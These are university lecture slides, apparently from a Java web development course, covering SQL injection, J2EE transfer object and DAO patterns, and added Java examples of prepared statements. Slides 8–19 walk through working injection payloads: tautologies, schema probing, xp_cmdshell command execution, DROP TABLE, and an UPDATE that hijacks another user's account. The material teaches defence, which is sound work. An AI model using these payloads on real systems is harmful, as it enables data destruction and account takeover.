
1 COMP 321 Week 5

2 Overview
– SQL Injection
– Core J2EE Patterns
– Lab 5-2 Introduction
– Exam Review

3 SQL Injection

4 SQL Injection (cont’d)
– An extremely common vulnerability in web applications
– Allows users to execute arbitrary SQL commands on your database!

5 SQL Injection (cont’d)
– Picture a website with an “I forgot my password” form that mails you your password
– This is a bad idea in the first place, and a sign of weak security
– How does this form work?

6 SQL Injection (cont’d)
How does this form work?
– POSTs what you enter in the email field to the server
– The server looks up your account, and mails the password to you

7 SQL Injection (cont’d)
The server probably looks up the account like this:

    SELECT fieldlist FROM table WHERE field = '$EMAIL';

If $EMAIL is not handled properly, the site is vulnerable. How can we test this theory?

8 SQL Injection (cont’d)
What if we enter addr@here.com' as our address?

    SELECT fieldlist FROM table WHERE field = 'addr@here.com'';

Invalid SQL will cause an error

9 SQL Injection (cont’d)
xp_cmdshell is an MSSQL stored procedure that allows execution of arbitrary operating system commands directly in the Windows command shell:

    SELECT fieldlist FROM table WHERE field = ''; exec master..xp_cmdshell 'ping 10.10.1.2'--';

10 SQL Injection (cont’d)
sp_makewebtask will create an HTML file:

    SELECT fieldlist FROM table WHERE field = ''; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES";--';

11 SQL Injection (cont’d)
What if we enter anything' OR 'x'='x as our address?

    SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x';

This will return all rows. Results depend on implementation:
1. Your password was sent to acct@here.com
2. Account not found
3. Server error

12 SQL Injection (cont’d)
Now we would like to know what fields are in the table. We can test for field names like this:

    SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --';

– If email is a column we’ll see some kind of successful response
– Otherwise we’ll see a SQL error

13 SQL Injection (cont’d)
Next, we’ll need to guess the table name:

    SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

14 SQL Injection (cont’d)
We’ve guessed the table name, but now we need to know if it's the table used in this query:

    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' AND members.email IS NULL; --';

This only works if the query is on members

15 SQL Injection (cont’d)
If the database is not read-only, we can now cause damage:

    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; DROP TABLE members; --';

16 SQL Injection (cont’d)
Dropping the table isn’t very useful. We could try to create a new user:

    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('me@here.com','pass','me','haX0r');--';

17 SQL Injection (cont’d)
Adding a user may not work:
1. May not have privileges to INSERT rows
2. Fields we haven’t guessed may be required, or the app may need real values in them
3. Relationships with other tables may be needed

18 SQL Injection (cont’d)
It may be easier to modify an existing user if we can find one
– Earlier query may have displayed an email address
– Website may list contact information
– Could use LIKE

    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' OR full_name LIKE '%Bob%';

19 SQL Injection (cont’d)
Once we have an account, we can change the email address:

    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'me@here.com' WHERE email = 'bob@example.com';

Now we can use the form to get the password!

20 Preventing SQL Injection
Sanitizing Inputs
– Not very effective on its own, but if necessary:
1. Use whitelists
2. Don’t sanitize only in JavaScript on the client; the server must check every value it receives
3. Consider all fields

21 Preventing SQL Injection (cont’d)
Restrict database permissions
– Don’t give write access to users that don’t require it
– Delete unused stored procedures
Don’t allow users to see detailed error messages
– Default error messages provide very useful information to attackers

22 Preventing SQL Injection (cont’d)
Use prepared statements

    SELECT username FROM users WHERE email = ?

– Values are treated as data, and not interpreted as part of the SQL syntax
Use stored procedures
– Has a similar effect, may also improve performance
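The password-lookup query from slides 7, 8 and 11 written both ways, as an added example that is not part of the slides: the string-concatenated version behaves exactly as the lecture describes (the tautology returns every row, the stray quote raises a database error), while the prepared-statement version with an allowlist check treats the same input as plain data. The members table and its rows are constructed for the demo, the email regular expression is an assumed policy, and the hsqldb jar (the Hypersonic database from Lab 4-1) is assumed to be on the classpath so the code runs against an in-memory database.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Added example: vulnerable vs. prepared-statement lookup for the
// "I forgot my password" form. Table, rows and regex are constructed here;
// requires hsqldb on the classpath.
public class PasswordLookupDemo {

    // Vulnerable: the submitted address is pasted into the SQL text,
    // exactly like $EMAIL on the slide.
    static List<String> lookupVulnerable(Connection c, String email) throws SQLException {
        String sql = "SELECT login_id FROM members WHERE email = '" + email + "'";
        List<String> hits = new ArrayList<>();
        try (Statement st = c.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) hits.add(rs.getString(1));
        }
        return hits;
    }

    // Assumed allowlist for the one field this form accepts: a simple address shape.
    private static final Pattern EMAIL =
        Pattern.compile("^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}$");

    // Hardened: allowlist first, then the value travels as a bind parameter and
    // can never become SQL syntax.
    static List<String> lookupSafe(Connection c, String email) throws SQLException {
        if (!EMAIL.matcher(email).matches()) {
            return List.of(); // reject quietly; no detailed error goes back to the user
        }
        List<String> hits = new ArrayList<>();
        try (PreparedStatement ps =
                 c.prepareStatement("SELECT login_id FROM members WHERE email = ?")) {
            ps.setString(1, email);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) hits.add(rs.getString(1));
            }
        }
        return hits;
    }

    public static void main(String[] args) throws SQLException {
        try (Connection c = DriverManager.getConnection("jdbc:hsqldb:mem:demo", "SA", "")) {
            // Constructed sample table, mirroring the column names used on the slides.
            try (Statement st = c.createStatement()) {
                st.execute("CREATE TABLE members (email VARCHAR(100), passwd VARCHAR(100), login_id VARCHAR(50))");
                st.execute("INSERT INTO members VALUES ('alice@example.com', 'secret1', 'alice')");
                st.execute("INSERT INTO members VALUES ('bob@example.com', 'secret2', 'bob')");
            }

            String tautology = "anything' OR 'x'='x";
            System.out.println("vulnerable, tautology: " + lookupVulnerable(c, tautology));
            System.out.println("safe, tautology:       " + lookupSafe(c, tautology));
            System.out.println("safe, real address:    " + lookupSafe(c, "bob@example.com"));

            // The stray quote from slide 8: the vulnerable query is malformed and the
            // driver raises an SQLException. This is the message that must never be
            // shown verbatim to the user.
            try {
                lookupVulnerable(c, "addr@here.com'");
            } catch (SQLException e) {
                System.out.println("vulnerable query failed (log this server-side only): " + e.getMessage());
            }
        }
    }
}
```

The stored-procedure alternative on the slide gives the same protection only when the procedure itself binds its parameters; a procedure that concatenates them into a dynamic SQL string and executes it is just as injectable as the concatenated Java above.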

23 Core J2EE Patterns
Data Transfer Object (DTO)
– Used to optimize access to data maintained in an application server
Data Access Object (DAO)
– Used to abstract access to data storage

24 Transfer Object
– In an application server, data is accessed through remote interfaces, and every call is potentially over a network
– Applications typically read data more often than they write data
– The client usually requires values for more than one property of an object
– A Data Transfer Object is a serializable object used to encapsulate the business data so that it can be retrieved in a single call

25 Transfer Object (cont’d)
– Client: The client application
– Business Object: A session bean, entity bean, or data access object (DAO) in the application server
– Data Transfer Object: The serializable object used to pass data back and forth

26 Transfer Object (cont’d)

27 Updatable Transfer Objects

28 Updatable Transfer Objects (cont’d)

29 Data Access Objects
– Applications need to store persistent data
– Different SQL statements may be needed for different databases
– Different types of persistent storage cause even greater variation in access methods (RDBMS, OODB, flat files, etc.)
– Data Access Objects hide data source implementation details behind a simple interface

30 Data Access Objects (cont’d)


33 DAO – Factory Method Pattern

34 DAO – Abstract Factory Pattern

35 Data Access Objects

    // Abstract class DAO Factory
    public abstract class DAOFactory {
        // List of DAO types supported by the factory
        public static final int CLOUDSCAPE = 1;
        public static final int ORACLE = 2;
        public static final int SYBASE = 3;

        // The concrete factories will have to implement these methods.
        public abstract CustomerDAO getCustomerDAO();
        public abstract AccountDAO getAccountDAO();
        public abstract OrderDAO getOrderDAO();

        public static DAOFactory getDAOFactory(int whichFactory) {
            switch (whichFactory) {
                case CLOUDSCAPE: return new CloudscapeDAOFactory();
                case ORACLE:     return new OracleDAOFactory();
                case SYBASE:     return new SybaseDAOFactory();
                default:         return null; // no implementation for this factory id
            }
        }
    }

36 Data Access Objects (cont’d)

    // Cloudscape concrete DAO Factory implementation
    public class CloudscapeDAOFactory extends DAOFactory {
        public static Connection createConnection() {
            // Create a connection
        }
        public CustomerDAO getCustomerDAO() {
            return new CloudscapeCustomerDAO(); // implements CustomerDAO
        }
        public AccountDAO getAccountDAO() {
            return new CloudscapeAccountDAO(); // implements AccountDAO
        }
        public OrderDAO getOrderDAO() {
            return new CloudscapeOrderDAO(); // implements OrderDAO
        }
    }

37 Data Access Objects (cont’d)

    // Interface that all CustomerDAOs must implement
    public interface CustomerDAO {
        public int insertCustomer(…);
        public boolean deleteCustomer(…);
        public Customer findCustomer(…);
        public boolean updateCustomer(…);
        public RowSet selectCustomersRS(…);
        public Collection selectCustomersTO(…);
        …
    }

38 Data Access Objects (cont’d)

    // CloudscapeCustomerDAO implementation of the CustomerDAO interface.
    // This class can contain all Cloudscape specific code and SQL.
    // The client is thus shielded from knowing these implementation details.
    public class CloudscapeCustomerDAO implements CustomerDAO {
        public CloudscapeCustomerDAO() {…}

        // The following methods can use
        // CloudscapeDAOFactory.createConnection() to get a connection
        public int insertCustomer(…) {…}
        public boolean deleteCustomer(…) {…}
        public Customer findCustomer(…) {…}
        public boolean updateCustomer(…) {…}
        public RowSet selectCustomersRS(…) {…}
        public Collection selectCustomersTO(…) {…}
    }

39 Data Access Objects (cont’d)

    public class Customer implements java.io.Serializable {
        // member variables
        int CustomerNumber;
        String name;
        String streetAddress;
        String city;
        …
        // getter and setter methods...
        …
    }

40 Data Access Objects (cont’d)

    DAOFactory cloudscapeFactory = DAOFactory.getDAOFactory(DAOFactory.CLOUDSCAPE);
    CustomerDAO custDAO = cloudscapeFactory.getCustomerDAO();

    int newCustNo = custDAO.insertCustomer(…);
    Customer cust = custDAO.findCustomer(…);
    cust.setAddress(…);
    cust.setEmail(…);
    custDAO.updateCustomer(cust);
    custDAO.deleteCustomer(…);

    // Find customers in New York
    Customer criteria = new Customer();
    criteria.setCity("New York");
    Collection customersList = custDAO.selectCustomersTO(criteria);
    // Iterate through customersList...
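The factory, DAO interface, concrete DAO and transfer object from slides 35 to 40 reduced to one complete, runnable program, as an added example that is not the slides' code: it keeps the same shapes (abstract factory, vendor-neutral interface, vendor-specific class holding all the SQL, serializable transfer object) but backs them with a single in-memory HSQLDB implementation and binds every value through a PreparedStatement, so the DAO layer is where injection is prevented rather than in each caller. HsqldbDAOFactory, HsqldbCustomerDAO, the customers table and the sample rows are invented for this example; the hsqldb jar is assumed to be on the classpath.

```java
import java.io.Serializable;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

// Added example: DAO + abstract factory + transfer object over HSQLDB.
// All class names below are invented for the demo; requires hsqldb on the classpath.
public class DaoDemo {

    // Transfer object: plain serializable data, no JDBC types leak to the client.
    public static class Customer implements Serializable {
        private static final long serialVersionUID = 1L;
        public int customerNumber;
        public String name;
        public String city;
        public Customer(int customerNumber, String name, String city) {
            this.customerNumber = customerNumber;
            this.name = name;
            this.city = city;
        }
        @Override public String toString() { return customerNumber + ":" + name + "@" + city; }
    }

    // The interface the client codes against; nothing vendor-specific here.
    public interface CustomerDAO {
        int insertCustomer(Customer c) throws SQLException;
        List<Customer> selectCustomersByCity(String city) throws SQLException;
    }

    public abstract static class DAOFactory {
        public static final int HSQLDB = 1;
        public abstract CustomerDAO getCustomerDAO();
        public static DAOFactory getDAOFactory(int whichFactory) {
            switch (whichFactory) {
                case HSQLDB: return new HsqldbDAOFactory();
                default: throw new IllegalArgumentException("unknown factory " + whichFactory);
            }
        }
    }

    public static class HsqldbDAOFactory extends DAOFactory {
        static Connection createConnection() throws SQLException {
            return DriverManager.getConnection("jdbc:hsqldb:mem:daodemo", "SA", "");
        }
        @Override public CustomerDAO getCustomerDAO() { return new HsqldbCustomerDAO(); }
    }

    // All SQL lives here, and every value is a bind parameter.
    public static class HsqldbCustomerDAO implements CustomerDAO {
        @Override public int insertCustomer(Customer c) throws SQLException {
            try (Connection conn = HsqldbDAOFactory.createConnection();
                 PreparedStatement ps = conn.prepareStatement(
                     "INSERT INTO customers (customer_number, name, city) VALUES (?, ?, ?)")) {
                ps.setInt(1, c.customerNumber);
                ps.setString(2, c.name);
                ps.setString(3, c.city);
                return ps.executeUpdate();
            }
        }

        @Override public List<Customer> selectCustomersByCity(String city) throws SQLException {
            List<Customer> out = new ArrayList<>();
            try (Connection conn = HsqldbDAOFactory.createConnection();
                 PreparedStatement ps = conn.prepareStatement(
                     "SELECT customer_number, name, city FROM customers WHERE city = ?")) {
                ps.setString(1, city);
                try (ResultSet rs = ps.executeQuery()) {
                    while (rs.next()) {
                        out.add(new Customer(rs.getInt(1), rs.getString(2), rs.getString(3)));
                    }
                }
            }
            return out;
        }
    }

    public static void main(String[] args) throws SQLException {
        // Keep one connection open so the in-memory database outlives the DAO's
        // short-lived connections; create the constructed demo schema on it.
        try (Connection keepAlive = HsqldbDAOFactory.createConnection();
             Statement st = keepAlive.createStatement()) {
            st.execute("CREATE TABLE customers (customer_number INT PRIMARY KEY, name VARCHAR(50), city VARCHAR(50))");

            CustomerDAO dao = DAOFactory.getDAOFactory(DAOFactory.HSQLDB).getCustomerDAO();
            dao.insertCustomer(new Customer(1, "Ann", "New York"));
            dao.insertCustomer(new Customer(2, "Ben", "Boston"));

            System.out.println("New York: " + dao.selectCustomersByCity("New York"));
            // A hostile criteria value is just a city name that matches nothing.
            System.out.println("tautology: " + dao.selectCustomersByCity("x' OR 'x'='x"));
        }
    }
}
```

Because the client only ever sees CustomerDAO and Customer, swapping HsqldbCustomerDAO for an Oracle or Sybase implementation (as slide 35's factory anticipates) changes no caller, and the parameter binding travels with the DAO rather than being something each caller has to remember.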

41 Lab 5-2 Introduction

42 Exam Review

43 Progress Check
Due this week:
– Lab 4-1 Hypersonic Setup
Due next week:
– Read IBM tutorials: Advanced Database Operations with JDBC; Managing Database Connections with JDBC
– Exam

